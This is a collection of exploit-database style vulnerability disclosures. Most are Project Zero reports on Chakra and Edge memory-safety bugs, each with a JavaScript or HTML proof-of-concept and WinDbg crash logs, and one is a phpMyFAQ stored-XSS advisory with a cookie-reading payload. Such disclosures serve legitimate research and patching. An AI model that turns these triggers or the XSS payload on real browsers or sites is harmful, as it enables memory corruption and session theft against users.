The problem is that "Parser::ParseTerm" also parses ".", etc. using "ParsePostfixOperators" without proper checks. As a result, an invalid syntax(i.e., {b = 0x1111...}.c) can be parsed and "ConvertObjectToObjectPattern" will fail to convert it to an object pattern.
In the following PoC, "ConvertObjectToObjectPattern" skips "{b = 0x1111...}.c". So the object literal will have incorrect members(b = 0x1111, c = 0x2222), this leads to type confusion(Chakra will think "c" is a setter and try to call it).
PoC:
-->
function f() {
({
a: {
b = 0x1111,
c = 0x2222,
}.c = 0x3333
} = {});
}
f();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1326
In Javascript, the code executed by a direct call to eval shares the caller block's scopes. Chakra handles this from the parser. And there's a bug when it parses "eval" in a catch statement's param.
ParseNodePtr Parser::ParseCatch()
{
...
pnodeCatchScope = StartParseBlock<buildAST>(PnodeBlockType::Regular, isPattern ? ScopeType_CatchParamPattern : ScopeType_Catch);
...
ParseNodePtr pnodePattern = ParseDestructuredLiteral<buildAST>(tkLET, true /*isDecl*/, true /*topLevel*/, DIC_ForceErrorOnInitializer);
...
}
1. "pnodeCatchScope" is a temporary block used to create a scope, and it is not actually inserted into the AST.
2. If the parser meets "eval" in "ParseDestructuredLiteral", it calls "pnodeCatchScope->SetCallsEval".
3. But "pnodeCatchScope" is not inserted into the AST. So the bytecode generator doesn't know it calls "eval", and it can't create scopes properly.
PoC:
-->
function f() {
{
let i;
function g() {
i;
}
try {
throw 1;
} catch ({e = eval('dd')}) {
}
}
}
f();
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1310
(function f(a = (function () {
print(a);
with ({});
})()) {
function g() {
f;
}
})();
When Chakra executes the above code, it doesn't generate bytecode for "g". This is a feature called "DeferParse". The problem is that the bytecode generated for "f" when the feature is enabled is different to the bytecode generated when the feature is disabled. This is because of "ByteCodeGenerator::ProcessScopeWithCapturedSym" which changes the function expression scope's type is not called when the feature is enabled.
Here's a snippet of the method which emits an incorrect opcode.
void ByteCodeGenerator::LoadAllConstants(FuncInfo *funcInfo)
{
...
if (funcExprWithName)
{
if (funcInfo->GetFuncExprNameReference() ||
(funcInfo->funcExprScope && funcInfo->funcExprScope->GetIsObject()))
{
...
Js::RegSlot ldFuncExprDst = sym->GetLocation();
this->m_writer.Reg1(Js::OpCode::LdFuncExpr, ldFuncExprDst);
if (sym->IsInSlot(funcInfo))
{
Js::RegSlot scopeLocation;
AnalysisAssert(funcInfo->funcExprScope);
if (funcInfo->funcExprScope->GetIsObject())
{
scopeLocation = funcInfo->funcExprScope->GetLocation();
this->m_writer.Property(Js::OpCode::StFuncExpr, sym->GetLocation(), scopeLocation,
funcInfo->FindOrAddReferencedPropertyId(sym->GetPosition()));
}
else if (funcInfo->bodyScope->GetIsObject())
{
this->m_writer.ElementU(Js::OpCode::StLocalFuncExpr, sym->GetLocation(),
funcInfo->FindOrAddReferencedPropertyId(sym->GetPosition()));
}
else
{
Assert(sym->HasScopeSlot());
this->m_writer.SlotI1(Js::OpCode::StLocalSlot, sym->GetLocation(),
sym->GetScopeSlot() + Js::ScopeSlots::FirstSlotIndex);
}
}
...
}
}
...
}
As you can see, it only handles "funcExprScope->GetIsObject()" or "bodyScope->GetIsObject()" but not "paramScope->GetIsObject()".
Without the feature, there's no case that only "paramScope->GetIsObject()" returns true because "ByteCodeGenerator::ProcessScopeWithCapturedSym" for "f" is always called and makes "funcInfo->funcExprScope->GetIsObject()" return true.
But with the feature, the method is not called. So it ends up emitting an incorrect opcode "Js::OpCode::StLocalSlot".
The feature is enabled in Edge by default.
PoC:
-->
let h = function f(a0 = (function () {
a0;
a1;
a2;
a3;
a4;
a5;
a6;
a7 = 0x99999; // oob write
with ({});
})(), a1, a2, a3, a4, a5, a6, a7) {
function g() {
f;
}
};
for (let i = 0; i < 0x10000; i++) {
h();
}
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1309
There is a security issue in Microsoft Edge related to how HTML documents are loaded. If Edge displays a HTML document from a slow HTTP server, it is possible that a part of the document is going to be rendered before the server has finished sending the document. It is also possible that some JavaScript code is going to trigger.
By making DOM modifications before the document had a chance of fully loading, followed by another set of DOM modifications afer the page has been loaded, it is possible to trigger memory corruption that could possibly lead to an exploitable condition.
A debug log is included below. Note that the crash RIP directly preceeds a (CFG-protected) indirect call, which demonstrates the exploitability of the issue.
Since a custom HTTP server is needed to demonstrate the issue, I'm attaching all of the required code. Simply run server.py and point Edge to http://127.0.0.1:8000/
Note: this has been tested on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393)
Debug log:
=========================================
(a68.9c0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=????????????????
0:013> k
# Child-SP RetAddr Call Site
00 000000eb`c42f8da0 00007ffa`9d8b243d edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa
01 000000eb`c42f8dd0 00007ffa`9d8b28e2 edgehtml!Collections::SGrowingArray<TSmartPointer<Tree::ANode,CStrongReferenceTraits> >::DeleteAt+0x89
02 000000eb`c42f8e00 00007ffa`9d8b0cd7 edgehtml!Undo::UndoNodeList::RemoveNodesCompletelyContained+0x5e
03 000000eb`c42f8e30 00007ffa`9d8ad79b edgehtml!Undo::WrapUnwrapNodeUndoUnit::RemoveNodesAtOldPosition+0x33
04 000000eb`c42f8e70 00007ffa`9d5b303d edgehtml!Undo::MoveForestUndoUnit::HandleWrapUnwrap+0x6b
05 000000eb`c42f8f10 00007ffa`9d8ac629 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa3fd
06 000000eb`c42f8f60 00007ffa`9d5b3085 edgehtml!Undo::ParentUndoUnit::ApplyScriptedOperationToChildren+0xb5
07 000000eb`c42f8ff0 00007ffa`9d11035c edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xfa445
08 000000eb`c42f9040 00007ffa`9d110125 edgehtml!Undo::UndoManager::ApplyScriptedOperationsToUserUnits+0x11c
09 000000eb`c42f9130 00007ffa`9d1d6f0d edgehtml!Undo::UndoManager::SubmitUndoUnit+0x125
0a 000000eb`c42f9170 00007ffa`9dc9c9ae edgehtml!CSelectionManager::CreateAndSubmitSelectionUndoUnit+0x141
0b 000000eb`c42f9200 00007ffa`9dc90b70 edgehtml!CRemoveFormatBaseCommand::PrivateExec+0xae
0c 000000eb`c42f92c0 00007ffa`9dc9057a edgehtml!CCommand::Exec+0xe8
0d 000000eb`c42f9350 00007ffa`9d55e481 edgehtml!CMshtmlEd::Exec+0x17a
0e 000000eb`c42f93b0 00007ffa`9d39cc34 edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0xa5841
0f 000000eb`c42f9470 00007ffa`9d21d6a1 edgehtml!CDoc::ExecHelper+0x5d18
10 000000eb`c42fb020 00007ffa`9d1dbb57 edgehtml!CDocument::Exec+0x41
11 000000eb`c42fb070 00007ffa`9d1dba25 edgehtml!CBase::execCommand+0xc7
12 000000eb`c42fb0f0 00007ffa`9d1db8ac edgehtml!CDocument::execCommand+0x105
13 000000eb`c42fb2e0 00007ffa`9d498155 edgehtml!CFastDOM::CDocument::Trampoline_execCommand+0x124
14 000000eb`c42fb3f0 00007ffa`9c930e37 edgehtml!CFastDOM::CDocument::Profiler_execCommand+0x25
15 000000eb`c42fb420 00007ffa`9c9e9073 chakra!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x177
16 000000eb`c42fb500 00007ffa`9c9596cd chakra!amd64_CallFunction+0x93
17 000000eb`c42fb560 00007ffa`9c95cec7 chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > > >+0x15d
18 000000eb`c42fb600 00007ffa`9c960f52 chakra!Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<0> > >+0xa7
19 000000eb`c42fb680 00007ffa`9c95f1b2 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x132
1a 000000eb`c42fb710 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x142
1b 000000eb`c42fb770 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
1c 000000eb`c42fbad0 00000284`bf4b0fa2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
1d 000000eb`c42fbb20 00007ffa`9c9e9073 0x00000284`bf4b0fa2
1e 000000eb`c42fbb50 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93
1f 000000eb`c42fbba0 00007ffa`9c95abc0 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
20 000000eb`c42fbc00 00007ffa`9c95f65d chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
21 000000eb`c42fbc50 00007ffa`9c95f217 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
22 000000eb`c42fbce0 00007ffa`9c963280 chakra!Js::InterpreterStackFrame::Process+0x1a7
23 000000eb`c42fbd40 00007ffa`9c9649c5 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
24 000000eb`c42fc090 00000284`bf4b0faa chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
25 000000eb`c42fc0e0 00007ffa`9c9e9073 0x00000284`bf4b0faa
26 000000eb`c42fc110 00007ffa`9c9580c3 chakra!amd64_CallFunction+0x93
27 000000eb`c42fc160 00007ffa`9c98ce3c chakra!Js::JavascriptFunction::CallFunction<1>+0x83
28 000000eb`c42fc1c0 00007ffa`9c98c406 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
29 000000eb`c42fc2b0 00007ffa`9c9ce4d9 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
2a 000000eb`c42fc320 00007ffa`9c9928a1 chakra!ScriptSite::CallRootFunction+0xb5
2b 000000eb`c42fc3c0 00007ffa`9c98e45c chakra!ScriptSite::Execute+0x131
2c 000000eb`c42fc450 00007ffa`9d333b2d chakra!ScriptEngineBase::Execute+0xcc
2d 000000eb`c42fc4f0 00007ffa`9d333a78 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
2e 000000eb`c42fc540 00007ffa`9d35ac27 edgehtml!CJScript9Holder::ExecuteCallback+0x18
2f 000000eb`c42fc580 00007ffa`9d35aa17 edgehtml!CListenerDispatch::InvokeVar+0x1fb
30 000000eb`c42fc700 00007ffa`9d33247a edgehtml!CListenerDispatch::Invoke+0xdb
31 000000eb`c42fc780 00007ffa`9d415a62 edgehtml!CEventMgr::_InvokeListeners+0x2ca
32 000000eb`c42fc8e0 00007ffa`9d290715 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
33 000000eb`c42fc910 00007ffa`9d2901a3 edgehtml!CEventMgr::Dispatch+0x405
34 000000eb`c42fcbe0 00007ffa`9d37434a edgehtml!CEventMgr::DispatchEvent+0x73
35 000000eb`c42fcc30 00007ffa`9d3ac5a2 edgehtml!COmWindowProxy::Fire_onload+0x14e
36 000000eb`c42fcd40 00007ffa`9d3ab23e edgehtml!CMarkup::OnLoadStatusDone+0x376
37 000000eb`c42fce00 00007ffa`9d3aa72f edgehtml!CMarkup::OnLoadStatus+0x112
38 000000eb`c42fce30 00007ffa`9d328d93 edgehtml!CProgSink::DoUpdate+0x3af
39 000000eb`c42fd2c0 00007ffa`9d32a550 edgehtml!GlobalWndOnMethodCall+0x273
3a 000000eb`c42fd3c0 00007ffa`b7a31c24 edgehtml!GlobalWndProc+0x130
3b 000000eb`c42fd480 00007ffa`b7a3156c user32!UserCallWinProcCheckWow+0x274
3c 000000eb`c42fd5e0 00007ffa`9347d421 user32!DispatchMessageWorker+0x1ac
3d 000000eb`c42fd660 00007ffa`9347c9e1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
3e 000000eb`c42ff8b0 00007ffa`ad7e9586 EdgeContent!LCIETab_ThreadProc+0x2c1
3f 000000eb`c42ff9d0 00007ffa`b7978364 iertutil!_IsoThreadProc_WrapperToReleaseScope+0x16
40 000000eb`c42ffa00 00007ffa`ba0a70d1 KERNEL32!BaseThreadInitThunk+0x14
41 000000eb`c42ffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:013> r
rax=00000284bc287fd8 rbx=00000284bc287f90 rcx=00000000abcdbbbb
rdx=0000000000000000 rsi=0000000000000017 rdi=0000000000000000
rip=00007ffa9d5f15ea rsp=000000ebc42f8da0 rbp=000000ebc42f8fb0
r8=0000000000000017 r9=000000ebc42f8e78 r10=00000fff53a47750
r11=0000000000010000 r12=0000027cb4fbcd10 r13=0000027cb4f95a78
r14=000000ebc42f8e70 r15=0000000000000000
iopl=0 nv up ei pl nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx] ds:00000000`abcdbbbb=????????????????
0:013> u 00007ffa`9d5f15ea
edgehtml!`TextInput::TextInputLogging::Instance'::`2'::`dynamic atexit destructor for 'wrapper''+0x1389aa:
00007ffa`9d5f15ea 488b01 mov rax,qword ptr [rcx]
00007ffa`9d5f15ed 488b80d0050000 mov rax,qword ptr [rax+5D0h]
00007ffa`9d5f15f4 ff15c654ab00 call qword ptr [edgehtml!_guard_dispatch_icall_fptr (00007ffa`9e0a6ac0)]
=========================================
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42758.zip
# Exploit Title: phpMyFAQ 2.9.8 Stored XSS
# Vendor Homepage: http://www.phpmyfaq.de/
# Software Link: http://download.phpmyfaq.de/phpMyFAQ-2.9.8.zip
# Exploit Author: Ishaq Mohammed
# Contact: https://twitter.com/security_prince
# Website: https://about.me/security-prince
# Category: webapps
# CVE: CVE-2017-14618
1. Description
Cross-site scripting (XSS) vulnerability in inc/PMF/Faq.php in phpMyFAQ
through 2.9.8 allows remote attackers to inject arbitrary web script or
HTML via the Questions field in an "Add New FAQ" action.
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14618
https://securityprince.blogspot.fr/2017/10/cve-2017-14618-phpmyfaq-298-cross-site.html
2. Proof of Concept
Steps to Reproduce:
1. Open the affected link "
http://localhost/phpmyfaq/admin/?action=editentry" with logged in user
with administrator privileges
2. Enter the <a onmouseover=alert(document.cookie)>xss link</a> in the
“Questions”
3. Save the FAQ
4. Login using any other user or simply click on the phpMyFAQ on the
top-right hand side of the web portal
5. Click on the latest FAQ added
6. Hover around the name "xss link"
3. Solution:
This vulnerability will be fixed in phpMyFAQ 2.9.9
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1301
There is an out-of-bounds read issue in Microsoft Edge that could potentially be turned into remote code execution. The vulnerability has been confirmed on Microsoft Edge 38.14393.1066.0 (Microsoft EdgeHTML 14.14393) as well as Microsoft Edge 40.15063.0.0 (Microsoft EdgeHTML 15.15063).
PoC:
==========================================
-->
<!-- saved from url=(0014)about:internet -->
<script>
function go() {
select1.multiple = false;
var optgroup = document.createElement("optgroup");
select1.add(optgroup);
var options = select1.options;
select2 = document.createElement("select");
textarea.setSelectionRange(0,1000000);
select1.length = 2;
document.getElementsByTagName('option')[0].appendChild(textarea);
select1.multiple = true;
textarea.setSelectionRange(0,1000000);
document.execCommand("insertOrderedList", false);
select2.length = 100;
select2.add(optgroup);
//alert(options.length);
var test = options[4];
//alert(test);
}
</script>
<body onload=go()>
<textarea id="textarea"></textarea>
<select id="select1" contenteditable="true"></select>
<!--
=========================================
Preliminary analysis:
When opening the PoC in Edge under normal circumstances, the content process will occasionally crash somewhere inside Js::CustomExternalObject::GetItem (see Debug Log 1 below) which corresponds to 'var test = options[4];' line in the PoC. Note that multiple page refreshes are usually needed to get the crash.
The real cause of the crash can be seen if Page Heap is applied to the MicrosoftEdgeCP.exe process and MemGC is disabled with OverrideMemoryProtectionSetting=0 registry flag (otherwise Page Heap settings won't apply to the MemGC heap). In that case an out-of-bounds read can be reliably observed in COptionsCollectionCacheItem::GetAt function (see Debug Log 2 below). What happens is that Edge thinks 'options' array contains 102 elements (this can be verified by uncommenting 'alert(options.length);' line in the PoC), however in reality the Options cache buffer is going to be smaller and only contain 2 elements. Thus if an attacker requests an object that is past the end of the cache buffer (note: the offset is chosen by the attacker) an incorrect object may be returned which can potentially be turned into a remote code execution.
Note: Debug logs were obtained on an older version of Edge for which symbols were available. However I verified that the bug also affects the latest version.
Debug log 1:
=========================================
(1790.17bc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
chakra!Js::CrossSite::MarshalVar+0x37:
00007ffa`c8dc23f7 488b4808 mov rcx,qword ptr [rax+8] ds:00000001`afccb7dc=????????????????
0:010> k
# Child-SP RetAddr Call Site
00 00000071`3ecfb090 00007ffa`c8dc0c92 chakra!Js::CrossSite::MarshalVar+0x37
01 00000071`3ecfb0c0 00007ffa`c8d959c8 chakra!Js::CustomExternalObject::GetItem+0x1c2
02 00000071`3ecfb1a0 00007ffa`c8d92d84 chakra!Js::JavascriptOperators::GetItem+0x78
03 00000071`3ecfb200 00007ffa`c8dfc1e0 chakra!Js::JavascriptOperators::GetElementIHelper+0xb4
04 00000071`3ecfb290 00007ffa`c8d85ac1 chakra!Js::JavascriptOperators::OP_GetElementI+0x1c0
05 00000071`3ecfb2f0 00007ffa`c8d8933f chakra!Js::ProfilingHelpers::ProfiledLdElem+0x1b1
06 00000071`3ecfb380 00007ffa`c8d8e639 chakra!Js::InterpreterStackFrame::OP_ProfiledGetElementI<Js::OpLayoutT_ElementI<Js::LayoutSizePolicy<0> > >+0x5f
07 00000071`3ecfb3c0 00007ffa`c8d8c852 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x179
08 00000071`3ecfb450 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x142
09 00000071`3ecfb4b0 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
0a 00000071`3ecfb860 000001b7`d68e0fb2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0b 00000071`3ecfb8b0 00007ffa`c8e77273 0x000001b7`d68e0fb2
0c 00000071`3ecfb8e0 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
0d 00000071`3ecfb930 00007ffa`c8d88260 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0e 00000071`3ecfb990 00007ffa`c8d8ccfd chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
0f 00000071`3ecfb9e0 00007ffa`c8d8c8b7 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
10 00000071`3ecfba70 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x1a7
11 00000071`3ecfbad0 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
12 00000071`3ecfbe20 000001b7`d68e0fba chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
13 00000071`3ecfbe70 00007ffa`c8e77273 0x000001b7`d68e0fba
14 00000071`3ecfbea0 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
15 00000071`3ecfbef0 00007ffa`c8dba4bc chakra!Js::JavascriptFunction::CallFunction<1>+0x83
16 00000071`3ecfbf50 00007ffa`c8db9a86 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
17 00000071`3ecfc040 00007ffa`c8e5c359 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
18 00000071`3ecfc0b0 00007ffa`c8dbff21 chakra!ScriptSite::CallRootFunction+0xb5
19 00000071`3ecfc150 00007ffa`c8dbbadc chakra!ScriptSite::Execute+0x131
1a 00000071`3ecfc1e0 00007ffa`c97d08dd chakra!ScriptEngineBase::Execute+0xcc
1b 00000071`3ecfc280 00007ffa`c97d0828 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
1c 00000071`3ecfc2d0 00007ffa`c970a8c7 edgehtml!CJScript9Holder::ExecuteCallback+0x18
1d 00000071`3ecfc310 00007ffa`c970a6b7 edgehtml!CListenerDispatch::InvokeVar+0x1fb
1e 00000071`3ecfc490 00007ffa`c97cf22a edgehtml!CListenerDispatch::Invoke+0xdb
1f 00000071`3ecfc510 00007ffa`c98a40d2 edgehtml!CEventMgr::_InvokeListeners+0x2ca
20 00000071`3ecfc670 00007ffa`c9720ac5 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
21 00000071`3ecfc6a0 00007ffa`c9720553 edgehtml!CEventMgr::Dispatch+0x405
22 00000071`3ecfc970 00007ffa`c97fd8da edgehtml!CEventMgr::DispatchEvent+0x73
23 00000071`3ecfc9c0 00007ffa`c983ba12 edgehtml!COmWindowProxy::Fire_onload+0x14e
24 00000071`3ecfcad0 00007ffa`c983a6a6 edgehtml!CMarkup::OnLoadStatusDone+0x376
25 00000071`3ecfcb90 00007ffa`c983a21f edgehtml!CMarkup::OnLoadStatus+0x112
26 00000071`3ecfcbc0 00007ffa`c97c5b43 edgehtml!CProgSink::DoUpdate+0x3af
27 00000071`3ecfd050 00007ffa`c97c7300 edgehtml!GlobalWndOnMethodCall+0x273
28 00000071`3ecfd150 00007ffa`e7571c24 edgehtml!GlobalWndProc+0x130
29 00000071`3ecfd210 00007ffa`e757156c user32!UserCallWinProcCheckWow+0x274
2a 00000071`3ecfd370 00007ffa`c0cccdf1 user32!DispatchMessageWorker+0x1ac
2b 00000071`3ecfd3f0 00007ffa`c0ccc3b1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
2c 00000071`3ecff640 00007ffa`dd649596 EdgeContent!LCIETab_ThreadProc+0x2c1
2d 00000071`3ecff760 00007ffa`e4f58364 iertutil!SettingStore::CSettingsBroker::SetValue+0x246
2e 00000071`3ecff790 00007ffa`e77d70d1 KERNEL32!BaseThreadInitThunk+0x14
2f 00000071`3ecff7c0 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:010> r
rax=00000001afccb7d4 rbx=000001b7d669fd80 rcx=ffff000000000000
rdx=00000001afccb7d4 rsi=000001afce6556d0 rdi=000000713ecfb250
rip=00007ffac8dc23f7 rsp=000000713ecfb090 rbp=000000713ecfb141
r8=0000000000000000 r9=000001b7d8a94bd0 r10=0000000000000005
r11=000001b7d9ebcee0 r12=0000000000000003 r13=0001000000000004
r14=0000000000000004 r15=000001afce6556d0
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
chakra!Js::CrossSite::MarshalVar+0x37:
00007ffa`c8dc23f7 488b4808 mov rcx,qword ptr [rax+8] ds:00000001`afccb7dc=????????????????
=========================================
Debug log 2 (with Page Heap on for MicrosoftEdgeCP.exe and MemGC disabled):
=========================================
(de8.13c8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
edgehtml!COptionsCollectionCacheItem::GetAt+0x51:
00007ffa`c96b1581 488b04d0 mov rax,qword ptr [rax+rdx*8] ds:000001b6`52743000=????????????????
0:010> k
# Child-SP RetAddr Call Site
00 00000091`94ffb2c0 00007ffa`c9569bb2 edgehtml!COptionsCollectionCacheItem::GetAt+0x51
01 00000091`94ffb2f0 00007ffa`c8dc0c51 edgehtml!CElementCollectionTypeOperations::GetOwnItem+0x122
02 00000091`94ffb330 00007ffa`c8d959c8 chakra!Js::CustomExternalObject::GetItem+0x181
03 00000091`94ffb410 00007ffa`c8d92d84 chakra!Js::JavascriptOperators::GetItem+0x78
04 00000091`94ffb470 00007ffa`c8dfc1e0 chakra!Js::JavascriptOperators::GetElementIHelper+0xb4
05 00000091`94ffb500 00007ffa`c8d85ac1 chakra!Js::JavascriptOperators::OP_GetElementI+0x1c0
06 00000091`94ffb560 00007ffa`c8d8933f chakra!Js::ProfilingHelpers::ProfiledLdElem+0x1b1
07 00000091`94ffb5f0 00007ffa`c8d8e639 chakra!Js::InterpreterStackFrame::OP_ProfiledGetElementI<Js::OpLayoutT_ElementI<Js::LayoutSizePolicy<0> > >+0x5f
08 00000091`94ffb630 00007ffa`c8d8c852 chakra!Js::InterpreterStackFrame::ProcessProfiled+0x179
09 00000091`94ffb6c0 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x142
0a 00000091`94ffb720 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
0b 00000091`94ffbad0 000001b6`4f600fb2 chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
0c 00000091`94ffbb20 00007ffa`c8e77273 0x000001b6`4f600fb2
0d 00000091`94ffbb50 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
0e 00000091`94ffbba0 00007ffa`c8d88260 chakra!Js::JavascriptFunction::CallFunction<1>+0x83
0f 00000091`94ffbc00 00007ffa`c8d8ccfd chakra!Js::InterpreterStackFrame::OP_CallI<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallI<Js::LayoutSizePolicy<0> > > >+0x110
10 00000091`94ffbc50 00007ffa`c8d8c8b7 chakra!Js::InterpreterStackFrame::ProcessUnprofiled+0x32d
11 00000091`94ffbce0 00007ffa`c8d90920 chakra!Js::InterpreterStackFrame::Process+0x1a7
12 00000091`94ffbd40 00007ffa`c8d92065 chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4a0
13 00000091`94ffc090 000001b6`4f600fba chakra!Js::InterpreterStackFrame::InterpreterThunk+0x55
14 00000091`94ffc0e0 00007ffa`c8e77273 0x000001b6`4f600fba
15 00000091`94ffc110 00007ffa`c8d85763 chakra!amd64_CallFunction+0x93
16 00000091`94ffc160 00007ffa`c8dba4bc chakra!Js::JavascriptFunction::CallFunction<1>+0x83
17 00000091`94ffc1c0 00007ffa`c8db9a86 chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x104
18 00000091`94ffc2b0 00007ffa`c8e5c359 chakra!Js::JavascriptFunction::CallRootFunction+0x4a
19 00000091`94ffc320 00007ffa`c8dbff21 chakra!ScriptSite::CallRootFunction+0xb5
1a 00000091`94ffc3c0 00007ffa`c8dbbadc chakra!ScriptSite::Execute+0x131
1b 00000091`94ffc450 00007ffa`c97d08dd chakra!ScriptEngineBase::Execute+0xcc
1c 00000091`94ffc4f0 00007ffa`c97d0828 edgehtml!CJScript9Holder::ExecuteCallbackDirect+0x3d
1d 00000091`94ffc540 00007ffa`c970a8c7 edgehtml!CJScript9Holder::ExecuteCallback+0x18
1e 00000091`94ffc580 00007ffa`c970a6b7 edgehtml!CListenerDispatch::InvokeVar+0x1fb
1f 00000091`94ffc700 00007ffa`c97cf22a edgehtml!CListenerDispatch::Invoke+0xdb
20 00000091`94ffc780 00007ffa`c98a40d2 edgehtml!CEventMgr::_InvokeListeners+0x2ca
21 00000091`94ffc8e0 00007ffa`c9720ac5 edgehtml!CEventMgr::_InvokeListenersOnWindow+0x66
22 00000091`94ffc910 00007ffa`c9720553 edgehtml!CEventMgr::Dispatch+0x405
23 00000091`94ffcbe0 00007ffa`c97fd8da edgehtml!CEventMgr::DispatchEvent+0x73
24 00000091`94ffcc30 00007ffa`c983ba12 edgehtml!COmWindowProxy::Fire_onload+0x14e
25 00000091`94ffcd40 00007ffa`c983a6a6 edgehtml!CMarkup::OnLoadStatusDone+0x376
26 00000091`94ffce00 00007ffa`c983a21f edgehtml!CMarkup::OnLoadStatus+0x112
27 00000091`94ffce30 00007ffa`c97c5b43 edgehtml!CProgSink::DoUpdate+0x3af
28 00000091`94ffd2c0 00007ffa`c97c7300 edgehtml!GlobalWndOnMethodCall+0x273
29 00000091`94ffd3c0 00007ffa`e7571c24 edgehtml!GlobalWndProc+0x130
2a 00000091`94ffd480 00007ffa`e757156c user32!UserCallWinProcCheckWow+0x274
2b 00000091`94ffd5e0 00007ffa`c0d2cdf1 user32!DispatchMessageWorker+0x1ac
2c 00000091`94ffd660 00007ffa`c0d2c3b1 EdgeContent!CBrowserTab::_TabWindowThreadProc+0x4a1
2d 00000091`94fff8b0 00007ffa`dd649596 EdgeContent!LCIETab_ThreadProc+0x2c1
2e 00000091`94fff9d0 00007ffa`e4f58364 iertutil!SettingStore::CSettingsBroker::SetValue+0x246
2f 00000091`94fffa00 00007ffa`e77d70d1 KERNEL32!BaseThreadInitThunk+0x14
30 00000091`94fffa30 00000000`00000000 ntdll!RtlUserThreadStart+0x21
0:010> r
rax=000001b652742fe0 rbx=0000000000000004 rcx=000001b64f877f30
rdx=0000000000000004 rsi=0000000000000000 rdi=000001b651ecffd0
rip=00007ffac96b1581 rsp=0000009194ffb2c0 rbp=000001b64f3bcc60
r8=0000000000000005 r9=000001b651ed9e50 r10=0000000000000005
r11=000001b65343ef20 r12=0000009194ffb370 r13=0001000000000004
r14=0000000000000000 r15=0000000000000004
iopl=0 nv up ei ng nz na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010286
edgehtml!COptionsCollectionCacheItem::GetAt+0x51:
00007ffa`c96b1581 488b04d0 mov rax,qword ptr [rax+rdx*8] ds:000001b6`52743000=????????????????
0:010> !heap -p -a 000001b6`52742ff0
address 000001b652742ff0 found in
_DPH_HEAP_ROOT @ 1ae3fae1000
